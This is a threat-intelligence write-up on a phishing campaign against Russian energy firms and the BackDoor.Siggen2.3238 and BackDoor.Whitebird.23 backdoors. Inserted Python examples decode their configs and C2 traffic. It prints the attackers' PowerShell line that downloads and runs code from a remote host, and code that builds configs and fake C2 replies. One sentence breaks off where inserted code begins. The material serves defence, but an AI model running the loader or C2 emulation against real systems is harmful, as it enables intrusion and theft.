In our experience of investigating computer security incidents, e-mail remains one of the most common channels attackers use to gain an initial foothold in a target's network infrastructure. A single careless action taken on a suspicious (or not-so-suspicious) message becomes the entry point for further infection, which is why cybercriminals, with varying degrees of success, make heavy use of social engineering techniques.
In this post we want to talk about our recent investigation of a spam campaign that targeted a number of enterprises of the Russian fuel and energy complex. All of the attacks followed the same scenario, using fake e-mails, and it seems that nobody spent much effort on the text of those e-mails.
Reconnaissance
It all started at the end of April 2020, when Doctor Web virus analysts detected a spam campaign in which hackers sent an updated telephone directory to employees of a number of Russian fuel and energy enterprises. Naturally, the directory was not genuine: the .docx document downloaded two images from remote resources, which in itself was already a warning sign.
One of them was downloaded to the user's computer from the server news[.]zannews[.]com. It is noteworthy that the domain name resembles the domain of the Kazakh anti-corruption media center zannews[.]kz. At the same time, the domain used immediately reminded us of another campaign from 2015, known as TOPNEWS, which used the ICEFOG backdoor and whose Trojan control domains contained the substring "news" in their names. Another interesting feature was that when the e-mails were sent to different recipients, the image download requests used either different request parameters or unique image names.
We believe this was done to collect information that would identify a "reliable" recipient, one who could then be counted on to open the message at the right time. The SMB protocol was used to download the image from the second server, which may have been done to collect NetNTLM hashes from the computers of employees who opened the received document: Word follows the UNC image reference automatically and Windows answers the remote share's NTLM challenge with the current user's credentials, so merely opening the document is enough to leak the hash. This is one of the reasons outbound SMB (TCP 445) to the Internet should be blocked at the perimeter.
And here is the message itself, with the fake directory:
In June 2020, the hackers began using a new domain name, sports[.]manhajnews[.]com, to host the images. Analysis showed that subdomains of manhajnews[.]com had been used in spam mailings since at least September 2019. One of the targets of that campaign was a large Russian university.
Also by June, the organizers of the attack had come up with a new text for the messages: this time the document contained information about the development of the industry. From the text it was clear that the author either was not a native Russian speaker or was deliberately trying to create that impression. Unfortunately, the ideas about industry development, as always, turned out to be just a cover: the document again downloaded two images, and the server was changed to download[.]inklingpaper[.]com.
The next innovation followed in July. In an attempt to evade detection of the malicious documents by antivirus programs, the attackers began using password-protected (encrypted) Microsoft Word documents; since the recipient has to be given the password, usually in the message body, a mail gateway that cannot extract it from the message cannot inspect the document at all. At the same time, the attackers decided to use a classic social engineering lure: a notification about a bonus payment.
The text of the message was again written in the same style, which should have raised additional suspicion among recipients. The server from which the images were downloaded was changed as well.
Note that in all of these cases the messages were sent from mailboxes registered on the mail[.]ru and yandex[.]ru domains.
Attack
By early September 2020 it was time for action. Our virus analysts recorded a new wave of attacks in which the attackers once again sent messages under the pretext of an updated telephone directory. This time, however, the attachment contained a malicious macro.
When the attached document was opened, the macro created two files:
- a VBS script, %APPDATA%\microsoft\windows\start menu\programs\startup\adoba.vbs, whose job is to launch the batch file; placing it in the Startup folder also gives the attackers persistence, since it runs at every logon of that user;
- the batch file itself, %APPDATA%\configstest.bat, which is obfuscated.
Its function boils down to launching a PowerShell shell with certain parameters. The parameters passed to the shell decode into the following commands:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;
As the commands above show, the domain from which the payload is downloaded is once again disguised as a news site. Note how the script obtains the MSXML XMLHTTP COM object through its CLSID rather than its ProgID, which avoids the New-Object "Msxml2.XMLHTTP" string that naive signatures key on, and then feeds the HTTP response body straight to Invoke-Expression (IEX), so the next stage never touches disk. A simple
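The download-and-IEX pattern above is easy to spot in process-creation telemetry once the command line has been unwrapped. The following Python is an added example and is not part of the original post or of Doctor Web's tooling: it decodes a -EncodedCommand argument if present, then looks for the three ingredients of this loader (the XMLHTTP CLSID, a remote .Open(), and IEX of responseText). The three sample command lines are constructed for the example; the first two embed the page's own loader.

```python
"""Flag process-creation events whose PowerShell command line carries the
CLSID-based XMLHTTP downloader shown above. Added detection example, not
Doctor Web's code. Input is the command-line field of Sysmon Event ID 1 or
Windows 4688 (with command-line auditing on); sample lines are constructed."""
import base64
import re

# The CLSID from the loader on this page resolves to the MSXML XMLHTTP object.
# Add further request-object CLSIDs here if your environment sees them.
XMLHTTP_CLSIDS = {"f5078f35-c551-11d3-89b9-0000f81fe221"}

_ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_CLSID = re.compile(r"gettypefromclsid\(\s*['\"]?\{?([0-9a-f-]{36})\}?['\"]?\s*\)", re.I)
_OPEN = re.compile(r"\.open\(\s*['\"](get|post)['\"]\s*,\s*['\"](https?://[^'\"]+)['\"]", re.I)
_IEX = re.compile(r"\b(iex|invoke-expression)\b[^;]*responsetext", re.I)


def expand_command_line(cmdline: str) -> str:
    """Return the script text, decoding -EncodedCommand (base64 of UTF-16LE) if present."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # not valid base64/UTF-16: fall back to matching the raw line


def analyze(cmdline: str) -> dict:
    """Score one command line; 'malicious' needs the CLSID trick plus IEX of the response."""
    script = expand_command_line(cmdline)
    clsids = [c.lower() for c in _CLSID.findall(script)]
    opens = _OPEN.findall(script)
    hits = {
        "xmlhttp_clsid": any(c in XMLHTTP_CLSIDS for c in clsids),
        "remote_open": bool(opens),
        "iex_response": bool(_IEX.search(script)),
    }
    return {
        "urls": [url for _, url in opens],
        "indicators": hits,
        "malicious": hits["xmlhttp_clsid"] and hits["iex_response"],
    }


# The loader from the page, verbatim, handed to powershell.exe in two ways an
# obfuscated .bat might do it; the third line is a benign control (all constructed).
LOADER = ('$o = [activator]::CreateInstance([type]::GetTypeFromCLSID('
          '"F5078F35-C551-11D3-89B9-0000F81FE221"));'
          '$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);'
          '$o.Send(); IEX $o.responseText;')


def encoded_command(script: str) -> str:
    """Build a -EncodedCommand line (base64 of UTF-16LE, as PowerShell expects)."""
    return "powershell.exe -NoP -W Hidden -EncodedCommand " + base64.b64encode(
        script.encode("utf-16-le")).decode()


SAMPLE_LINES = [
    "powershell.exe -NoP -W Hidden -Command " + LOADER,
    encoded_command(LOADER),
    'powershell.exe -Command "Get-Content C:\\logs\\app.log | Select-String error"',
]


def scan(lines):
    """Return (line, urls) for every command line the analyzer flags."""
    return [(ln, analyze(ln)["urls"]) for ln in lines if analyze(ln)["malicious"]]


if __name__ == "__main__":
    for line, urls in scan(SAMPLE_LINES):
        print("FLAGGED:", urls, "<-", line[:60])
```

The encoded form is the one worth testing your pipeline against: a rule that only matches the raw loader string misses the same script once the batch file passes it through -EncodedCommand.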
BackDoor.Siggen2.3238
The first is BackDoor.Siggen2.3238: our specialists had not encountered it before, and there were no mentions of this program from other antivirus vendors.
The program is a backdoor written in C++ that runs on 32-bit Windows operating systems.
BackDoor.Siggen2.3238 can communicate with its control server over two protocols, HTTP and HTTPS. The sample examined uses HTTPS. Requests to the server carry the following User-Agent:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
All requests are accompanied by the following set of parameters:
%s;type=%s;length=%s;realdata=%send
where each %s is replaced, in order, by:
- the ID of the infected computer;
- the type of request being sent;
- the length of the data in the realdata field;
- the data itself.
At the stage of collecting information about the infected system, the backdoor generates a string of the form:
lan=%s;cmpname=%s;username=%s;version=%s;
where lan is the infected computer's IP address, cmpname the computer name, username the user name, and version the string 0.0.4.03.
This information, with the sysinfo identifier, is sent in a POST request to the control server at https[:]//31.214[.]157.14/log.txt. If BackDoor.Siggen2.3238 receives the HEART signal in response, the connection is considered successful and the backdoor enters its main communication loop with the server.
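The request format and the sysinfo line above can be expressed as a small codec, which is what you would reach for when decoding captured POST bodies to /log.txt or standing up a lab responder. The code below is an added example, not Doctor Web's or the malware's code; the bot ID and host details are constructed, and the assumption that length counts the characters of an ASCII payload is the example's own.

```python
"""Encoder/decoder for the BackDoor.Siggen2.3238 request body described above
(added example, not Doctor Web's code). The format strings are the ones quoted
on the page; that 'length' counts characters of an ASCII payload is assumed."""
import re

VERSION = "0.0.4.03"  # the fixed 'version' string the sample reports


def build_sysinfo(lan: str, cmpname: str, username: str) -> str:
    """The first check-in line: lan=%s;cmpname=%s;username=%s;version=%s;"""
    return f"lan={lan};cmpname={cmpname};username={username};version={VERSION};"


def build_request(bot_id: str, req_type: str, data: str) -> str:
    """'%s;type=%s;length=%s;realdata=%send' with the page's four substitutions."""
    return f"{bot_id};type={req_type};length={len(data)};realdata={data}end"


_REQ = re.compile(
    r"^(?P<id>[^;]+);type=(?P<type>[^;]+);length=(?P<length>\d+);realdata=(?P<data>.*)end$",
    re.S,
)


def parse_request(body: str) -> dict:
    """Split a captured body into fields; reject it when the declared length
    disagrees with the payload (cheap protection against mangled captures)."""
    m = _REQ.match(body)
    if not m:
        raise ValueError("not a Siggen2 request body")
    data = m.group("data")
    if int(m.group("length")) != len(data):
        raise ValueError(f"length mismatch: header says {m.group('length')}, payload is {len(data)}")
    out = {"id": m.group("id"), "type": m.group("type"), "data": data}
    if out["type"] == "sysinfo":
        # key=value pairs separated by ';', with a trailing ';'
        out["fields"] = dict(kv.split("=", 1) for kv in data.strip(";").split(";"))
    return out


def is_heart(response_body: str) -> bool:
    """A HEART reply is what makes the bot consider the check-in successful."""
    return response_body.strip() == "HEART"


# Constructed sample: a bot ID and a sysinfo line for a fictitious workstation.
SAMPLE_SYSINFO = build_sysinfo("10.0.0.25", "WS-ACCT-07", "ivanov")
SAMPLE_BODY = build_request("A1B2C3D4", "sysinfo", SAMPLE_SYSINFO)

if __name__ == "__main__":
    print(SAMPLE_BODY)
    print(parse_request(SAMPLE_BODY)["fields"])
```

A proxy log or IDS rule can key on the literal ";type=" followed later by ";realdata=" and a trailing "end" in a POST body; the length check above is what keeps a decoder from being fooled by truncated captures.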
A fuller description of how BackDoor.Siggen2.3238 works is available in our virus library.
BackDoor.Whitebird.23
The second program is a modification of the BackDoor.Whitebird backdoor, already known to us from an incident involving a government agency in Kazakhstan. This version is written in C++ and is designed to run on both 32-bit and 64-bit Windows operating systems.
Like most programs of this type, BackDoor.Whitebird.23 is designed to establish an encrypted connection to the control server and give the attacker unauthorized control of the infected computer. It is installed on the compromised system by means of a dropper.
The sample we examined was a malicious library with the following two exports:
- Google Play
- Test
At the start of its work it decrypts the configuration embedded in the backdoor body, using an algorithm based on XOR with the byte 0x99. The configuration has the following layout:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
To guarantee continuous operation, the backdoor rewrites the values stored in the working_hours field of the configuration. This field holds 1440 bytes, each taking the value 0 or 1 and representing one minute of each hour of the day. The backdoor creates a separate thread for each network interface, listens on that interface, and looks for proxy-server authentication packets sent by the infected computer. When such a packet is detected, the backdoor adds the proxy server's details to its list. It also checks for a proxy through the WinAPI function InternetQueryOptionW.
The program checks the current hour and minute and compares them with the data in the working_hours configuration field. If the value for the corresponding minute of the day is non-zero, a connection to the control server is established.
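The configuration layout and the working_hours gate above can be turned into a decoder for the embedded config. This is an added example, not Doctor Web's code: the struct layout is the one printed above, the XOR key is 0x99 as the text states, and the sample configuration (campaign name, C2 address, a 09:00 to 17:59 schedule) is constructed here and encoded with the same XOR so the decoder has realistic input. The gapa8c field is left unparsed because the page does not describe it.

```python
"""Decoder for the BackDoor.Whitebird.23 embedded configuration and its
working_hours schedule (added example, not Doctor Web's code). Layout is the
st_cfg struct printed above; the key is the 0x99 XOR the text describes. The
sample config is constructed here and encoded with that XOR."""
import struct

CFG_FMT = "<I128s512sI200s200s1440s100sIII50s50s256s"   # st_cfg, field by field
CFG_SIZE = struct.calcsize(CFG_FMT)                      # 2956 bytes, no padding needed
XOR_KEY = 0x99


def xor99(blob: bytes) -> bytes:
    """The config 'decryption': a single-byte XOR, so it is its own inverse."""
    return bytes(b ^ XOR_KEY for b in blob)


def _wstr(raw: bytes) -> str:
    """wchar_t[] field: UTF-16LE up to the first NUL."""
    return raw.decode("utf-16-le", "replace").split("\x00", 1)[0]


def _cstr(raw: bytes) -> str:
    """_BYTE[] field: bytes up to the first NUL."""
    return raw.split(b"\x00", 1)[0].decode("latin-1")


def parse_config(encrypted: bytes) -> dict:
    if len(encrypted) < CFG_SIZE:
        raise ValueError(f"config blob too short: {len(encrypted)} < {CFG_SIZE}")
    f = struct.unpack(CFG_FMT, xor99(encrypted[:CFG_SIZE]))
    return {
        "dword0": f[0],
        "campaign": _wstr(f[1]),
        "cnc_addr": _wstr(f[2]), "cnc_port": f[3],
        "cnc_addr2": _wstr(f[4]), "cnc_addr3": _wstr(f[5]),
        "working_hours": f[6],                 # 1440 bytes, one per minute of the day
        "proxy_domain": _wstr(f[7]),
        "proxy_port": f[8], "proxy_type": f[9], "use_proxy": f[10],
        "proxy_login": _cstr(f[11]), "proxy_password": _cstr(f[12]),
        # gapa8c (f[13]) is not described on the page and is left unparsed
    }


def beacon_allowed(working_hours: bytes, hour: int, minute: int) -> bool:
    """Non-zero byte for the current minute of the day means: connect to the C2."""
    return working_hours[hour * 60 + minute] != 0


def pack_config(campaign: str, cnc_addr: str, cnc_port: int, working_hours: bytes) -> bytes:
    """Build an encrypted config the way a builder would (constructed for the example)."""
    def w(s: str) -> bytes:
        return s.encode("utf-16-le")          # struct pads the field with NULs
    plain = struct.pack(CFG_FMT, 0, w(campaign), w(cnc_addr), cnc_port, b"", b"",
                        working_hours, b"", 0, 0, 0, b"", b"", b"")
    return xor99(plain)


# Constructed sample: beacon only from 09:00 to 17:59, inside the victim's working day.
SCHEDULE = bytes(1 if 9 * 60 <= m < 18 * 60 else 0 for m in range(1440))
SAMPLE_CFG = pack_config("test-campaign", "203.0.113.10", 443, SCHEDULE)

if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CFG)
    print(cfg["campaign"], cfg["cnc_addr"], cfg["cnc_port"])
    print("beacon at 10:30:", beacon_allowed(cfg["working_hours"], 10, 30))
```

On a real sample you would locate the 2956-byte blob in the binary and pass it to parse_config; a schedule restricted to office hours is the kind of detail that explains why a beacon is never seen at night in your proxy logs.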
Connecting to the server imitates the establishment of a TLS 1.0 connection between client and server. The backdoor body contains two buffers.
The first buffer contains a TLS 1.0 Client Hello packet.
The second buffer contains a TLS 1.0 Client Key Exchange packet with a key length of 0x100 bytes, a Change Cipher Spec, and an Encrypted Handshake Message.
When sending the Client Hello packet, the backdoor writes 4 bytes of the current time and 28 bytes of pseudo-random data, computed as follows, into the Client Random field:
v3 = time(0);
// byte-swap the 32-bit time so it is stored big-endian, as a genuine TLS gmt_unix_time is
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
// 28 bytes as seven DWORDs: swapped time plus a DWORD read from the configured C2 address
// (cnc_addr is wchar_t, so &cnc_addr[i / 4] is byte offset i / 2)
for ( i = 0; i < 28; i += 4 )
    *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
// finally each byte is XORed with 7 times its index
for ( j = 0; j < 28; ++j )
    clientrnd[j] ^= 7 * (_BYTE)j;
The resulting packet is sent to the control server. The response (a Server Hello packet) is checked for:
- conformance to TLS protocol version 1.0;
- a match between the timestamp specified by the client (the first 4 bytes of the Random field) and the timestamp specified by the server;
- a match between the first 4 bytes following the timestamp in the client's and the server's Random fields.
If these checks pass, the backdoor prepares the Client Key Exchange packet. To do so it modifies the Public Key in the Client Key Exchange packet, as well as the Encryption IV and Encrypted Data in the Encrypted Handshake Message.
The backdoor then receives a packet from the command and control server, verifies that the TLS protocol version is 1.0, and accepts a further 54 bytes (the packet body). This completes the connection setup.
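The Client Random derivation and the three Server Hello checks above describe the whole of the fake TLS handshake, and they have a practical consequence: the server must echo the client's timestamp and the next 4 bytes back in its own Random field, which a real TLS server never does. The Python below is an added example, not Doctor Web's code; it reimplements the decompiled routine, builds a minimal Server Hello record, applies the backdoor's checks, and shows the resulting network heuristic (a ServerHello.random that repeats the first 8 bytes of ClientHello.random). That the time is stored big-endian in the first 4 bytes, and the C2 address and timestamp used, are assumptions made for the example.

```python
"""Client Random derivation of BackDoor.Whitebird.23 and the Server Hello checks
it performs (added example, not Doctor Web's code). The 4-byte timestamp is
assumed to be written big-endian like a genuine TLS gmt_unix_time; cnc_addr
and the timestamp are constructed inputs."""
import struct

TLS_1_0 = b"\x03\x01"


def client_random(unix_time: int, cnc_addr: str) -> bytes:
    """32 bytes: big-endian time, then 28 bytes derived from time and the C2 address."""
    unix_time &= 0xFFFFFFFF
    # t = (v3 >> 24) + (((b0 << 8 | b1) << 8 | b2) << 8): a plain byte swap of time()
    t = struct.unpack(">I", struct.pack("<I", unix_time))[0]
    # cnc_addr is wchar_t[256] in the config: &cnc_addr[i / 4] is byte offset i / 2
    cnc_w = cnc_addr.encode("utf-16-le").ljust(512, b"\x00")
    rnd = bytearray(28)
    for i in range(0, 28, 4):
        dw = struct.unpack_from("<I", cnc_w, i // 2)[0]
        struct.pack_into("<I", rnd, i, (t + dw) & 0xFFFFFFFF)
    for j in range(28):
        rnd[j] ^= (7 * j) & 0xFF
    return struct.pack(">I", unix_time) + bytes(rnd)


def build_server_hello(server_random: bytes, version: bytes = TLS_1_0) -> bytes:
    """Minimal TLS record: 0x16 | version | len | Handshake(2=ServerHello) | len | version | random."""
    assert len(server_random) == 32
    body = version + server_random
    hs = b"\x02" + len(body).to_bytes(3, "big") + body
    return b"\x16" + version + len(hs).to_bytes(2, "big") + hs


def server_hello_accepted(record: bytes, client_rnd: bytes) -> bool:
    """The three checks the backdoor applies before sending Client Key Exchange."""
    if len(record) < 43 or record[0] != 0x16:
        return False
    if record[1:3] != TLS_1_0:                      # 1. record layer says TLS 1.0 ...
        return False
    hs = record[5:]
    if hs[0] != 0x02 or hs[4:6] != TLS_1_0:         # ... and so does the ServerHello
        return False
    srv_rnd = hs[6:38]
    if srv_rnd[0:4] != client_rnd[0:4]:             # 2. server echoes our timestamp
        return False
    return srv_rnd[4:8] == client_rnd[4:8]          # 3. and the 4 bytes after it


def fake_c2_reply(client_rnd: bytes) -> bytes:
    """What the real C2 has to send to pass: echo 8 bytes, pad the rest (constructed)."""
    return build_server_hello(client_rnd[:8] + bytes(24))


def looks_like_whitebird(client_rnd: bytes, server_rnd: bytes) -> bool:
    """Network heuristic: a ServerHello.random that repeats ClientHello.random[0:8]."""
    return server_rnd[:8] == client_rnd[:8]


if __name__ == "__main__":
    cr = client_random(1600000000, "203.0.113.10")   # constructed C2 address and time
    print("client random:", cr.hex())
    print("accepted:", server_hello_accepted(fake_c2_reply(cr), cr))
```

A genuine TLS 1.0 server fails check 2 and 3 every time, so a capture in which the two randoms share their first 8 bytes is worth an alert regardless of what the cipher suites or SNI look like.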
A fuller description of how BackDoor.Whitebird.23 works is available in our virus library.
Findings and conclusions
Analysis of the documents, the malware, and the infrastructure used allows us to say with confidence that the attack was prepared by one of the Chinese APT groups. Given the functionality of the backdoors installed on victims' computers in a successful attack, infection leads, at a minimum, to the theft of confidential information from the computers of the attacked organizations.
In addition, a highly likely scenario is the installation of specialized Trojans with specific functions on local servers: domain controllers, mail servers, Internet gateways and the like. As we saw in the example,
Source: habr.com